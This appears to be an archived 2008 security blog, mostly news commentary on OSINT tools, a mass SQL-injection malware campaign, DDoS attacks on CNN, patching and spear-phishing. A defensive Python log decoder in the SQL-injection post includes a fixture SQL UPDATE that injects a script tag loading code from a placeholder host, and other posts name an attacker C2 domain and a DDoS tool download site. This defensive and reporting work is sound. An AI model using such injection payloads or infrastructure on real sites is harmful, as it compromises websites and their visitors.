I haven't seen too many people post this yet but there are already some presentations online.
Get them here.

Now to wait impatiently for the videos and the rest of the presentations to come online.


Wednesday

The dangers of Web 2.0: information gathering tactics 101



Well, we don't even have to talk about Web 2.0 or social networks. A byproduct of the technology age we live in is information. We all have or leave an extensive information waste footprint without even realizing it. This can be (mis)used for identity theft or social engineering. It has only been a few months since I mentioned Maltego. The tool, which has migrated from a web-based application to a downloadable GUI, still leaves Google behind when it comes to personal information gathering.

Since the web-based application has been taken offline, I downloaded the GUI and played around with it. Of course, I used it on my own name and on my company, and I can only say 'WOW'. Just try it, you'll be surprised by the information out there.

What is it?

  • Maltego is a program that can be used to determine the relationships and real world links between:
    • People
    • Groups of people (social networks)
    • Companies
    • Organizations
    • Web sites
    • Internet infrastructure such as:
      • Domains
      • DNS names
      • Netblocks
      • IP addresses
    • Phrases
    • Affiliations
    • Documents and files
  • These entities are linked using open source intelligence.
  • Maltego is easy and quick to install - it uses Java, so it runs on Windows, Mac and Linux.
  • Maltego provides you with a graphical interface that makes seeing these relationships instant and accurate - making it possible to see hidden connections.
  • Using the graphical user interface (GUI) you can see relationships easily - even if they are three or four degrees of separation away.
  • Maltego is unique because it uses a powerful, flexible framework that makes customizing possible. As such, Maltego can be adapted to your own, unique requirements.

What can Maltego do for me?

  • Maltego can be used for the information gathering phase of all security related work. It will save you time and will allow you to work more accurately and smarter.
  • Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items.
  • Maltego provides you with a much more powerful search, giving you smarter results.
  • If access to "hidden" information determines your success, Maltego can help you discover it.
Look at the screenshots here.
Download here.
Download your API key here.

Your security policy and awareness program should take this into account. To get an idea of the issue and some suggested countermeasures, read ENISA's paper on "Security Issues and Recommendations for Online Social Networks". (Thanks to ISSA BE for mentioning this paper.)
Introduction.

This paper aims to provide a useful introduction to security issues in the area of Social Networking, highlight the most important threats and make recommendations for action and best practices to reduce the security risks to users. Examples are given from a number of providers throughout the paper. These should be taken as examples only and there is no intention to single out a specific provider for criticism or praise. The examples provided are not necessarily those most representative or important, nor is the aim of this paper to conduct any kind of market survey, as there might be other providers which are not mentioned here and nonetheless are equally or more representative of the market.

Audience

This paper is aimed at corporate and political decision-makers as well as Social Network application-providers. It also seeks to raise awareness among political and corporate decision-makers of the legal and social implications of new developments in Social Networking technologies. In particular, the findings should have important implications for education and data protection policy.
Some recommendations of the report are:
  • Recommendation SN.1 Encourage awareness-raising and educational campaigns
  • Recommendation SN.2 Review and reinterpret the regulatory framework
  • Recommendation SN.3 Increase transparency of data handling practices
  • Recommendation SN.4 Discourage the banning of SNSs in schools
  • Recommendation SN.5 Promote stronger authentication and access-control where appropriate
  • .....
Download full report here.

Update: Chris Gates also refers to the following two presentations (thanks!!):

Presentations on Maltego:
CansecWest07 Presentation [PPT] (1.8MB)
FIRST 2007 Presentation [PPT] (4.5MB)


Mass malware SQL injections still continuing and the number of Belgian sites infected



In the last weeks and months, several campaigns targeted a lot of websites to inject them with malicious JavaScript, mainly through SQL injection. High-profile websites, like for example CNET.com, were also victims of these attacks. It seems that they are at it again. A lot of websites got infected with "1.js", including UK government sites and a United Nations website, "events.un.org". It was only last December that the UN website also got hacked through an SQL injection.


This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js which is hosted on http://www.nihao[removed].com The JavaScript code then redirects the user to 1.htm (also hosted on the same server). Once loaded, the file attempts 8 different exploits (the attack last April utilised 12). The exploits target Microsoft applications, specifically browsers not patched against the VML exploit MS07-004 as well as other applications. Ominously, files named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time of writing.

There are further similarities too between the two mass attacks. Resident on the latest malicious domain is a tool used in the execution of the attack. An analysis of that tool can be found in the ISC diary entry here. Mentioned in that diary entry is http://www.2117[removed].net. Our blog on that attack can be found here. It appears that same tool was used to orchestrate this attack too.

When we first started tracking the use of this domain, the malicious JavaScript was still making use of http://www.nmida[removed].com/:

Now the attackers are referring to a file hosted on the new domain of http://www.nihao[removed].com:

Sites of varying content have been infected including UK government sites, and a United Nations website as can be seen by the Google search results below.

The number of sites affected is in the hundreds of thousands (Source: Websense)
Read full post here.

At the moment, Google shows some 177.000 websites infected. And please don't visit them with JavaScript enabled. Use your Google Foo.



I was curious how many Belgian websites got infected. Ladies and gentlemen of the jury, it's 56!!!



My first instinct was to report this, but my next thought was: to whom? I don't have time to track the webmasters down one by one. And Belgium doesn't have a CERT to contact. We do have the FCCU (Federal Computer Crime Unit), but that is partly a forensics team, not a nationwide CERT. *sigh*

I left them a message anyway. Let's hope it will do some good.

Sophos has some more information about the SQL injection technique used.


This morning, I was investigating another attack that is most likely related. The target of the malicious script tag has changed, but the underlying malicious SQL is very similar. The malicious injection can be seen below:

As you can see, the main guts of the malicious SQL (within @S) are obfuscated within the CAST(0x…) block (which is trimmed for clarity). Decryption is trivial, enabling us to identify how the attack works.

In brief, the SQL will concatenate a malicious script tag into all (n)text and (n)varchar fields of all user tables in the MS SQL database. Nasty. Particularly for webmasters who have been hit, leaving them with a cumbersome cleanup process, and the challenge of preventing the same attack hitting them again.

And the purpose of the attack? Feeding the 1.js file into our automation system, we see a whole mass of pages that will get loaded as a result of browsing a compromised page. This is represented in the flowchart below (click to enlarge):

  • yellow blob: malicious 1.js file loaded from compromised pages
  • green arrows: page loads via an iframe (or similar)
  • red arrows: exploit payload, in this case resulting in the download of some Win32 malware
Read their full analysis.
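As an added example (not Sophos's or Websense's code), here is a small decoder an incident responder can run over web server request logs to turn the CAST(0x…) hex blob described above back into readable SQL and flag the indicators of this campaign type. The request line is a constructed fixture, the domain is a placeholder, and the hex is built from the readable statement so the fixture stays legible.

```python
import re
from urllib.parse import unquote

# Matches CAST(0x<hex> AS VARCHAR(...)) or NVARCHAR(...) wherever it appears in a request.
CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)

# What a decoded statement of this campaign type contains: it enumerates the
# system catalog and appends a script tag to every text column it finds.
INDICATORS = ("sysobjects", "syscolumns", "sp_executesql", "update", "<script")


def decode_cast_blobs(request_text):
    """Return a list of (literal_type, decoded_sql) for every CAST(0x..) blob.

    NVARCHAR literals are UTF-16LE (two bytes per character), which is why the
    raw request shows roughly four hex digits per SQL character.
    """
    text = unquote(request_text)           # logs usually hold the URL-encoded form
    results = []
    for hexblob, literal_type in CAST_RE.findall(text):
        # A truncated log line can leave an odd digit; drop it rather than fail.
        hexblob = hexblob[: len(hexblob) - len(hexblob) % 2]
        raw = bytes.fromhex(hexblob)
        if literal_type.upper() == "NVARCHAR":
            raw = raw[: len(raw) - len(raw) % 2]   # keep whole UTF-16 code units
            decoded = raw.decode("utf-16-le", errors="replace")
        else:
            decoded = raw.decode("latin-1")
        results.append((literal_type.upper(), decoded))
    return results


def classify(decoded_sql):
    """Return the indicator strings present in a decoded statement (empty = nothing seen)."""
    lower = decoded_sql.lower()
    return [i for i in INDICATORS if i in lower]


# Constructed fixture: the statement hidden inside the blob (domain is a
# placeholder) and the request line a web log would record for it.
SAMPLE_SQL = "UPDATE [news] SET [body]=[body]+'<script src=http://malicious.example/1.js></script>'"
SAMPLE_REQUEST = (
    "GET /page.asp?id=1;SET%20@S=CAST(0x"
    + SAMPLE_SQL.encode("utf-16-le").hex().upper()
    + "%20AS%20NVARCHAR(4000)) HTTP/1.1"
)

if __name__ == "__main__":
    for literal_type, sql in decode_cast_blobs(SAMPLE_REQUEST):
        print(literal_type, classify(sql), sql)
```

A hit on "update" together with "<script" in a decoded blob is the cleanup trigger: as the Sophos text says, every (n)text and (n)varchar column of every user table has to be checked, not just the page that was noticed.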

Update (23/04/2008): I got a response from the FCCU and the BELNET CERT has taken over the case. Their priority is of course to their constituency (BELNET). But as only CERT in Belgium, they try to be a "last resort" point of contact as long as their resources will allow it. That's very nice to hear!!! I might have a meeting with them in the future to exchange some ideas.

In the meantime, the number of infected sites displayed has mounted up to 273.000 and the infected Belgian sites up to 93.


Tuesday

How did The Sports Network recover from the Chinese defacement?



During an attack on CNN, the Sports Network got defaced because the Chinese hackers thought they were a part of CNN. But they were only a source for CNN.

So how did TSN recover from the attack? The Zdnet blog Zeroday has some information on it.

The company’s sports information and wire service was the priority when SportsNetwork brought its operations back up. Within a few hours, SportsNetwork, which primarily competes with Stats Inc., was serving its feeds to thousands of customers, which range from portals to most newspapers in the U.S. The data feeds (example right) represent the bulk of SportsNetwork’s revenue. The company’s site serves more as marketing showcase.

The lesson: Recover the revenue generating tools first. Sports Network, based in Hatboro, PA, has about 130 employees, a CTO and about 18 developers working on the site.

Will Sports Network change its security policies? Charles said on the security front his company had “all the things that everyone has” and noted that it’s obvious that his firm will have to do more. The challenge is that any change the company makes will have to be echoed by more than 1,000 customers.

Sports Network may speed up plans to add another layer of security, but is leaving the planning to his CTO. Whatever Sports Network does it’ll have to do so quickly. “The irony is we’re sending a gang of people to Beijing for the Olympics,” says Charles.

Read the full article.

Do you have an incident response plan? Did you test it? Do you have good backups?


(IN)SECURE Magazine Issue 16 released


  • Security policy considerations for virtual worlds
  • US political elections and cybercrime
  • Using packet analysis for network troubleshooting
  • The effectiveness of industry certifications
  • Is your data safe? Secure your web apps
  • RSA Conference 2008 / Black Hat 2008 Europe
  • Windows log forensics: did you cover your tracks?
  • Traditional vs. non-traditional database auditing
  • Payment card data: know your defense options
  • Security risks for mobile computing on public WLANs: hotspot registration
  • Network event analysis with Net/FSE
  • Producing secure software with security enhanced software development processes
  • AND MORE!
Download issue here.


Update to Java Runtime environment 6 Update 6



On my home systems, I try to keep up to date as much as possible, and I even scan with PSI monthly to see which third-party patches I'm missing. But for Java it doesn't seem easy to follow up on patches.

Sun Microsystems issued another update to fix security and stability problems with its Java software, but few users are likely to have noticed, as Sun currently isn't doing anything to alert people.

The latest update to version of Java most Microsoft Windows users have on their machines -- Java Runtime Environment (JRE, also called simply "Java Update" in the Windows Add/Remove programs list) -- is JRE 6 Update 6. However, both of the methods I normally use to tell whether I'm running the latest, patched version failed to tell me that there was a new version of Java available. Update 6 plugs at least one security vulnerability, along with at least a dozen other bugs.

Users who want to install this latest update now can grab it from this link here (the JRE is the 5th item listed). As always, remember to uninstall any older versions of Java you may have, either before or after updating, as Sun's Java installers still do not take care of this basic process for the user.
I've found that the Java updater that ships with the software typically takes anywhere from two to four weeks after an update has been shipped to alert me that it is available. Sun's Java homepage is usually a bit faster on the uptake, but it also still tells me that I'm running the most current version with my install of Java 6 Update 5. (Source: Washingtonpost.com)
So why doesn't Sun keep people more up to date? If you go to the regular download site, you can still see that they recommend version 6 update 5. It was also a small shock to read that their updater only notifies you after two to four weeks. So upgrade your system to version 6 update 6 and uninstall the previous versions to remain secure.

Especially in light of my previous post, this is a little bit worrying.


Patching, how fast is fast enough?



John Bambenek from SANS Internet Storm Center has an interesting post about the patch time window.

For some time, many researchers have been pointing to the fact that the "patch window" (the time between a patch being released and an exploit being developed) has been decreasing. A few years ago, the ISC's Johannes Ullrich did a presentation on this subject which showed the patch window decreasing to a few days. Today, another Handler, Mari Nichols, pointed me to this research from a joint project between Berkeley, University of Pittsburgh and Carnegie Mellon.

For some time, it has been known that the patch can be reverse-engineered to help attackers write an exploit for a vulnerability that might not be fully detailed in public accounts (for good reason). The bad guys have gotten pretty good at this where they can turn around an exploit in a day or so after a patch is released. What is interesting about this research is that they developed means partly using off-the-shelf tools to make this process automatic.

In some of the cases they tried, they claimed to be able to create an exploit in minutes after receiving the patch and comparing the patched version of the application with the unpatched version. To be fair, their process seemed "dirty" such that more often than not the exploit created crashes or DoS type exploits and several attempts were needed to get something closer to viable. The process often took minutes so when/if the method is improved it could be trivial to create something that grabbed patches ASAP, turn an exploit in minutes and start infecting vulnerable machines before 3am during the monthly patch dump with automated patching.

A solution suggested by the authors is "secure distribution of patches". To me, this is meaningless. You need to get patches out to people with a minimum amount of effort. This is why automated patching was such a good thing. But even if you encrypt, require passwords and logins, etc... you are going to delay the time for legitimate people to patch, and attackers (who are perfectly able to buy Windows legit) will grab the patches quickly anyway. You'd only make the window of vulnerability longer by making things secure without a tangible benefit.

Solution: Not much, we've known the window was closing for awhile. Responding quickly and proactively to threats is still a must and the use of temporary workarounds will probably rise in value. (Source ISC SANS)

Download the paper here: Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications (www.cs.cmu.edu).

Abstract:

The automatic patch-based exploit generation problem is: given a program P and a patched version of the program P′, automatically generate an exploit for the potentially unknown vulnerability present in P but fixed in P′.

In this paper, we propose techniques for automatic patch-based exploit generation, and show that our techniques can automatically generate exploits for 5 Microsoft programs based upon patches provided via Windows Update. Although our techniques may not work in all cases, a fundamental tenet of security is to conservatively estimate the capabilities of attackers. Thus, our results indicate that automatic patch-based exploit generation should be considered practical. One important security implication of our results is that current patch distribution schemes which stagger patch distribution over long time periods, such as Windows Update, may allow attackers who receive the patch first to compromise the significant fraction of vulnerable hosts who have not yet received the patch.

So how fast do YOU patch?

Monday

How to disable USB storage devices



With all the high-capacity storage devices like the iPod classic going up to 160GB and still fitting in your inside pocket, people are getting more scared of data loss. Even Dave Lewis from Liquidmatrix recently saw someone at a client site using an iPod to pull corporate data onto it as a hard drive.

On Liquidmatrix, he mentions an easy trick to disable this without deactivating USB entirely. It just disables USB storage devices.

Run regedit and search for the key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR

The key value for “Start” is set to “3″. This permits USB storage to be attached to the system in question. If this is flipped to “4″ storage devices will be disabled. Whatever you do, make a backup before attempting any registry work.
Thanks Dave!

Some endpoint security software packages give employees the possibility to use USB pendrives and the like, while the data won't be usable on a non-corporate PC. They also allow more granular control over connectivity in endpoint devices. But it doesn't always have to be that complicated (or expensive).

McAfee Avertlabs also had an interesting piece: Data in your pocket.
As devices grow smaller and other devices not really seen as “traditional computers” like mobiles and other storage-capable devices become more popular, the physical security of such devices becomes important again. Mobile phones these days can easily store 2-8 GBs of data or more. This could include business critical emails, identity, credit card information or family pictures. As these devices are small, they can easily be lost, stolen and pilfered. Most of these devices run sophisticated enough operating systems, often with wireless capabilities and Bluetooth as well, making other application and network issues applicable to them as well. Not only such handheld devices, even traditional equipment is more vulnerable to physical security these days as most of the concentration is on securing the systems from network or application attacks.

Data that can roam with us in our pockets is less physically secure, but good user education and software can at least keep it from getting misused, if not able to prevent it from getting lost.

Update on CNN.com attacks, slightly down but (not) defaced (UPDATED)



Let me give you the latest updates on the attacks on CNN.com following my previous post. Now we know what they meant with "this has already obstructed the motherland’s normal network communications". The attack did slow down CNN.com, but it never stopped working. It did seem to slow down the site from the China mainland.

The latest post on Arbornetworks gives us some interesting details:

Even after the attacks were called off, we saw evidence of some DDoS attacks, and CNN has confirmed it. Maybe not everyone got the message, or maybe someone just felt like grinding an axe. The attacks didn’t seem to disrupt their service much, and the network operators around CNN seemed to handle the attacks quite well. Most of the attacks were TCP SYN floods (still popular after all these years), targeting three different CNN websites. Attack intensity was pretty small on average, with the peak attack intensity still a modest (by global attack standards) 100 Mbps. Here’s a breakdown of the attacks as we saw them over the weekend.

Attack bandwidth peak: 100 Mbps, average: 20 Mbps
Attack duration peak: 30 minutes, average: under 15 minutes
Attack targets www2.cnn.com, www3.cnn.com, edition.cnn.com

[Figure: Attacks by type]

But TheDarkVisitor referred us to Danwei.org, telling us that the website of The Sports Network (TSN) got defaced. As of this writing, there is still a 'sorry page' displayed. A screenshot of the defaced website is displayed at the beginning of this post. The Chinese hackers were celebrating their victory with this screenshot.

The Sports Network (commonly known as TSN) is a Canadian English language cable television specialty channel and is Canada's leading English language sports television channel. I don't see a direct connection between the two besides that sports.si.cnn.com resolves to the same IP as www.sportsnetwork.com, but it's hosted on another network than CNN. So the Chinese hackers thought they were hacking CNN.com.




Update:
Changed the text above. It was not a part of CNN that went down but an innocent bystander. And it seems that CNN did go down for a very short time, at least according to Netcraft:

The CNN News website has twice been affected since an earlier distributed denial of service attack last Thursday. CNN fixed Thursday's attack by limiting the number of users who could access the site from specific geographical areas.


Subsequently, an attack was purportedly organised to start on Saturday 19th April, but cancelled. However, our performance monitoring graph shows CNN's website suffered downtime within a 3 hour period on Sunday morning, followed by other anomalous activity on Monday morning, where response times were greatly inflated.


This is how good the targeted attacks are getting



Targeted attacks have been seen frequently in the news this last year. Here is an example of how good they are getting. From businessweek.com:

The e-mail message addressed to a Booz Allen Hamilton executive was mundane—a shopping list sent over by the Pentagon of weaponry India wanted to buy. But the missive turned out to be a brilliant fake. Lurking beneath the description of aircraft, engines, and radar equipment was an insidious piece of computer code known as "Poison Ivy" designed to suck sensitive data out of the $4 billion consulting firm's computer network.

The Pentagon hadn't sent the e-mail at all. Its origin is unknown, but the message traveled through Korea on its way to Booz Allen. Its authors knew enough about the "sender" and "recipient" to craft a message unlikely to arouse suspicion. Had the Booz Allen executive clicked on the attachment, his every keystroke would have been reported back to a mysterious master at the Internet address cybersyndrome.3322.org, which is registered through an obscure company headquartered on the banks of China's Yangtze River. (Source: businessweek.com)

The rest of the article doesn't provide a lot of new elements and in general just points with a big finger at China. I'm not getting into a political issue but an IP in China does not equal the Chinese government of course. Read it with a grain of salt.

Probably a Word document was used containing an obfuscated payload that is not well detected by most known virus scanners. And the well-known 3322.org domain was used here too. Monitor your DNS lookups, I would say.

Some of the social engineering tricks they are using are getting really creative and probably effective, like the following one:

A highly targeted email scam that singled out as many as 20,000 senior corporate executives on Monday resurfaced Wednesday as attackers sought to replicate their success installing identity-stealing software on the PCs of some of the world's most powerful individuals.

Like the first volley of emails, these latest messages masquerade as an official subpoena requiring the recipient to appear before a federal grand jury. The emails correctly address CEOs and other high-ranking executives by their full name and include their phone number and company name, according to Matt Richard, director of rapid response at iDefense, a division of VeriSign that helps protect financial institutions from fraud.

Recipients who click on a link that offers a more detailed copy of the subpoena are taken to a website that informs them they must install a browser add-on in order to read the document. Clicking "yes" installs a backdoor and key logging software that steals log-in credentials used on websites for banks and other sensitive organizations.

About 2,000 executives took the bait on Monday, and an additional 70 have fallen for the latest scam, Richard said. Operating under the assumption that as many as 10 percent of recipients fell for the ruse, he estimated that 21,000 executives may have received the email. Only eight of the top 35 anti-virus products detected the malware on Monday, and on Wednesday, only 11 programs were flagging the new payload, which has been modified to further evade being caught.

The group behind the attack is the same one that has launched other high-profile spear-phishing expeditions, in which a relatively small number of emails are tailored to their targets by including their names, titles and other personal information. The customization is designed to fool the recipients into believing they are legitimate. The practice of targeting CEO and other high-ranking execs is being dubbed as whaling.

The malware installed from Monday's attack caused infected PCs to report to a server based in Singapore. The updated trojan had machines reporting to servers in China, Richard said. In both cases, the IP addresses of attackers' servers were controlled by a group that goes by the name Piradius, among others. (Source: The Register)

Very nice tactic. Ten percent fell for the ruse. Not bad, but I would have expected more. It's better this way of course. I would probably have fallen for the trick by following the link, but being asked to install a browser plugin would have raised all kinds of red flags with me. Nevertheless, we see that AV detection was 8/35, and that is in line with what I have seen before. Spylogic has a few more hints about the functionality of this Trojan.

So the lesson here is, don't give your executive management the (administrator) rights to install software. Period. I know this is an exception in a lot of companies where some get 'VIP' treatment.

Also be aware and educate people about the information they put online. A lot of people are using Google, LinkedIn, MySpace etc. to gather personal information.

I know that a lot of people don't believe in it but I still think that user awareness might be the extra layer that might help.

An article from Darkreading seems to follow this line of thinking:

Educating users on security policies remains the most significant barrier to improving enterprises' ability to protect against malware, cited by 56 percent of respondents, according to the study. More than half (52 percent) of the companies surveyed said "unwillingness of users to follow good security practices" was a chief barrier. "Convincing upper management of the need for more security against malicious code" was a barrier for 34 percent of respondents.

"Some organizations are doing really well and are making security part of their culture," says Drew. "Other organizations -- and these are organizations where a security breach could have profound financial implications -- still haven't even implemented some basic elements of security enforcement. But in both cases, even where things are going well, user education is still one of the biggest issues they face." (Source: Darkreading.com)

On the other hand, users just give their passwords away when being offered chocolate. Is there a way to re-educate them?

PPP: People, Processes and Products. It may come from ITIL, but it also applies to security.


Sunday

How to hack life: how to be more efficient and productive



This is not a security-related post, unless you consider it the "A" from the CIA triad (no, not the CIA agency). How can you be more available to the people and tasks that most need it? How can you be more efficient in your life or at work? How do you tackle that overcrammed inbox and all those interruptions? To help you learn how to "hack life", I'm presenting two websites: Lifehacker.com and 43folders.com. Here are some of the useful articles you will find there.

Gina Trapani, editor of Lifehacker, has also written two books: Upgrade Your Life: The Lifehacker Guide to Working Smarter, Faster, Better and Lifehacker: 88 Tech Tricks to Turbocharge Your Day.

So, learn to hack life for more fun and productivity.

By the way, the slides from the presentation "Inbox Zero" are among my favorite presentations.

Paper: "Measurements and Mitigation of Peer-to-Peer-based Botnets"



The Honeyblog has posted their paper on the "Measurements and Mitigation of Peer-to-Peer-based Botnets: A Case Study on StormWorm"

Abstract:

Botnets, i.e., networks of compromised machines under a common control infrastructure, are commonly controlled by an attacker with the help of a central server: all compromised machines connect to the central server and wait for commands. However, the first botnets that use peer-to-peer (P2P) networks for remote control of the compromised machines appeared in the wild recently. In this paper, we introduce a methodology to analyze and mitigate P2P botnets. In a case study, we examine in detail the Storm Worm botnet, the most widespread P2P botnet currently propagating in the wild. We were able to infiltrate and analyze the botnet in depth, which allows us to estimate the total number of compromised machines. Furthermore, we present two different ways to disrupt the communication channel between controller and compromised machines in order to mitigate the botnet, and evaluate the effectiveness of these mechanisms.
If you ever wanted to know some of the more technical details about Storm Worm, download it here.


DDoS Attack on CNN, cancelled or delayed? An overview.



Our story started on April 16th, when The Dark Visitor blog warned us about a plan to DDoS CNN.com (see picture above):

Several Chinese hacker groups are calling for a DDOS attack on the CNN website to begin at 8:00pm on 19 April 2008. While only three websites have openly posted about this attack, my guess is that many more calls are going on behind closed doors. (Source: The Dark Visitor)

In the days that followed, the call got more attention and started to spread:

Second, many more Chinese sites, not just hacker sites, are starting to call for the DDOS attack on CNN. Also they are starting to solidify their plans. Here are the details from one posting on the Guilin University of Electronic Technology bulletin board:

  1. Attack will start on 19 April 2008, at 8:00 pm
  2. DDOS attack on www.cnn.com
  3. The DDOS attack is going to last over three hours
  4. They need a large number of compromised computers to carry out the attack and are requesting everyone's support in putting together the number needed

The plan has many more details but unfortunately the language is too technical for me to translate.

Here are additional sites calling for the attack on CNN.


(source: The Dark Visitor)

This was getting some press coverage. So, about a day before the planned attack, the organizers, identified as "Revenge of the Flame", tried to call off the attack and reschedule it for the near future:
The Chinese hacker group that has been organizing to attack CNN has been identified as the “Revenge of the Flame.” They recently released a statement calling off the DDoS attack on CNN; however, it may have come too late to stop some of its members from going after the site. (Source: The Dark Visitor)
And some guys could not wait until the 19th and went ahead with an attack. The guys from Arbornetworks did an analysis.


Destinations
www.cnn.com (one of the IPs for this DNS name)

Attacks in past 24 hours
36 attacks measured

Attacks by type
36 TCP SYN floods

Average and max attack duration
330 seconds average (5.5 minutes), 337 second maximum (slightly longer)

These attacks were very small, they barely registered, so it’s hard to say that they’re the massive onslaught that we may see this weekend. It’s possible this is entirely unrelated - a lot of hackers try to bring down major websites like this every day. (Source: Arbornetworks)

CNN itself reported on the attack which at that point didn't cause major harm on the website.

CNN was targeted Thursday by attempts to interrupt its news Web site, resulting in countermeasures that caused the service to be slow or unavailable to some users in limited areas of Asia.

"CNN took preventative measures to filter traffic in response to attempts to disrupt our Web site. A small percentage of CNN.com users in Asia are impacted," the network said in a statement.

"We do not know who is responsible, nor can we confirm where it came from," the statement continued.

A CNN spokesman said the Web site began to notice problems around midday Thursday and took measures to isolate the trouble by limiting the number of users who could access it from specific geographic areas.

As a result, he said, some users in those areas experienced temporary slowdowns or problems accessing the site.

The spokesman could not offer an estimate of how many users were affected. However, he said that the impact on daily usage was "imperceptible" and that the site "at no time" went down.

Service had returned to normal by mid-morning Friday, he said. (Source: CNN.com)

So was this just a hot air balloon? Maybe not: another update on The Dark Visitor showed us that the leader of Revenge of the Flame, "cn_Magistrate", posted attack tools to assist in the attack.

As always, my thanks for everyone's strong sense of nationalistic responsibility; once again, the Magistrate is grateful to everyone.

Today is 18 April, we are angry and we shall roar, the announcement follows:

  1. Prior to 8:00 pm on 18 April 2008, we invite everyone on IS (ID number 12570496). We will have an important matter to pass along. (This part a little rough on xlation) Please note our compatriots will find a way online, obey directions that have been put in place.
  2. Tool download address, considering that there are many normal web users who do not have a high-degree of technical knowledge, we are providing idiot-type (really means for those who don’t know) tools for download. The download address: http://playgood.ys168.com/. Everyone please pay attention to the group announcements.
  3. Everyone please remain disciplined, listen to the directions of each of the group managers. Pay attention to your own words, deeds and essence. We are all Chinese! (source: The Dark Visitor)
The latest update from Arbornetworks at 8 PM US Eastern Time indicated that the attacks were ramping up:
More attacks to report, with greater intensity. It looks like some people are still giving this a go. I cannot, with the data I have, attribute this to any of the Chinese attacker groups that are supposedly behind the rally call, so this could be other parties entirely. (Source: Arbornetworks)
So this was the latest update, and CNN.com seems to be alive and kicking. Was the attack successful? What was the overall impact? I'll update this post in the next hours as I find new updates.

Update from Thedarkvisitor: Revenge of the Flame disbands, denies all responsibility for attack on CNN…and kills website

Currently, everyone on the internet is using the instrument of attack as a means to express their passion and this has already obstructed the motherland’s normal network communications. This is something we do not wish to see happen. Regardless if it is “Revenge of the Flame” or not, we hope that everyone can rationally reflect on this question.

From this moment, the Revenge of the Flame is disbanded!! If there are any notifications after this, they will be posted here. We respectfully ask that you pay attention to this page.

Read full post here.

CNN still seems to be live. I'm just wondering what they meant with "this has already obstructed the motherland’s normal network communications".

Here is the update: Update on CNN.com attacks, not down but defaced

Friday

Free ebook: Vulnerability Management For Dummies



It's not a joke. It's a real book. John Wiley & Sons publishes the first "Vulnerability Management For Dummies" in cooperation with Qualys.

Vulnerability management is defined as the systematic finding and elimination of weak spots or security flaws in an IT network.

"Vulnerability Management For Dummies" simply explains the essential steps of vulnerability management and shows you how to select the right tools. In five succinct parts it leads the reader through an essential understanding of the need for vulnerability management and provides a guide to the essential best practice steps, the various options available, the pros and cons of automated vulnerability management, and finally provides a valuable ten-point checklist for removing vulnerabilities in the network.

"According to Gartner and industry luminaries, Vulnerability Management is the cornerstone of security and compliance best practices. It is an application that requires management, security and audit teams to collaborate with the production team to effectively identify and remediate security and compliance issues in a timely manner," said Philippe Courtot, CEO and chairman of Qualys. "Our goal in publishing this book in collaboration with our customers, which we are very thankful for, is to provide real-world examples on how to do vulnerability management in order to address the security and compliance issues facing all of us."

An electronic version of the book will also be available to download next Tuesday, 22 April; please visit http://www.qualys.com/dummies

Nitesh says "Be Secure, and You'll be Compliant"



Nitesh says it very beautifully: "Be Secure, and You'll be Compliant"

First, no company should ever strategize their overall security efforts based on a 3rd party requirement. A company's strategy should be based on its specific business goals that should be used to drive the security strategy. Tony Spinelli, CSO of Equifax, has articulated this point very well. He says: Most companies and [their] security leaders are getting lost because of [having to be] compliant -- regulations saying you have to do X or Y.... A lot of people are letting compliance drive security, and that's as wrong as you can get....You have to become secure to be compliant; otherwise, you respond and react and reinvest without leverage.

Second, it is not true that security code reviews are overwhelmingly more expensive than black box reviews. The entire purpose of a security code review is to combine it with a solid security SDLC process, with the aim to push left, and the goal to find and remediate security vulnerabilities earlier on in the development cycle - the overall costs of which are likely to be lower than the cost of relying upon black-box penetration assessments. Run, don't walk, from any vendor that tells you to base your application security strategy on black-box penetration assessments because anything else is too expensive - you'll end up paying through the nose while failing to fix the root cause of what's ailing your development efforts.

Third, web application firewalls can be useful, yet the most terrible band-aids when applied for the wrong reasons. Just because a 3rd party standard may require it doesn't mean it's the only thing you need to do.

In summary, please do not let a requirement like PCI drive your overall strategy. Understand your goals and needs, aim to be secure, and you will be compliant. Try the formula the other way around, and your strategy will be flawed, your security budget won't be big enough, you will struggle to keep up with requirements & regulations, and you will fail to demonstrate risk reduction to your organization.

He's my man of the day. Being compliant doesn't mean being secure. The Hannaford case was a very good example!!! It sounds so simple: be more secure to be compliant.


OWASP AppSec Europe 2008 - Belgium



Sebastian from OWASP Belgium notified me about the upcoming OWASP AppSec Europe 2008 - Belgium.

Welcome to the European OWASP Application Security Conference! After successful OWASP Conferences in the United States and Europe, we are back in Belgium: 5 tutorials and 2 conference tracks in the historic center of Ghent on May 19-22 2008!

The conference is stuffed with top notch presentations from industry recognised speakers and technical experts on the latest application security risks and trends. New for AppSec Europe: technical vendor demos and a Capture the Flag!

Conference (May 21-22)
The Great Information Security Scrap Yard Challenge - Mark Curphey
Software Security: State of the Practice 2008 - Gary McGraw
The OWASP ESAPI project - Dave Wichers
Trends in Web Hacking Incidents: What's hot for 2008 - Ofer Shezaf
Evaluation Criteria for Web Application Firewalls - Ivan Ristic
HTML5 security - Thomas Roessler
The OWASP Orizon Project internals - Paolo Perego
Remo presentation (Input Validation) - Christian Folini
Best Practices Guide: Web Application Firewalls - Alexander Meisel
Google-Hacking and Google-Shielding - Amichai Shulman
NTLM Relay Attacks - Eric Rachner
The Law of Conservation of Bugs - Gunnar Peterson
Security in Agile Development - Dave Wichers
Security framework is not in the code - Sam Reghenzi
Exploiting Online Games - Gary McGraw
SHIELDS - Eva Coscia
Graph Analysis for WebApps: From Nodes to Edges - Simon Roses Femerling
The OWASP Education Project - Martin Knobloch
Dynamic Taint Propagation: Finding Vulnerabilities Without Attacking - Brian Chess
Threat Modeling for Application Designers & Architects - Shay Zalalichin
Scanstud: Evaluating static analysis tools - Martin Johns
Office 2.0: Software as a Service, Security on the Sidelines? - John Heasman
How Data Privacy affects Applications and Databases - Dirk De Maeyer
The OWASP Anti-Samy project - Jason Li
Input validation: the Good, the Bad and the Ugly - Johan Peeters
Refereed paper track keynote - Dieter Gollmann

Tutorials (May 19-20):
Building and Testing Secure Web Applications
Leading the Development of Secure Applications
Building Secure Rich Internet Applications
Web Services and XML Security
Open Source ModSecurity Training

Registration is available via the OWASP Conference Cvent site at: Cvent link

The conference fees are:

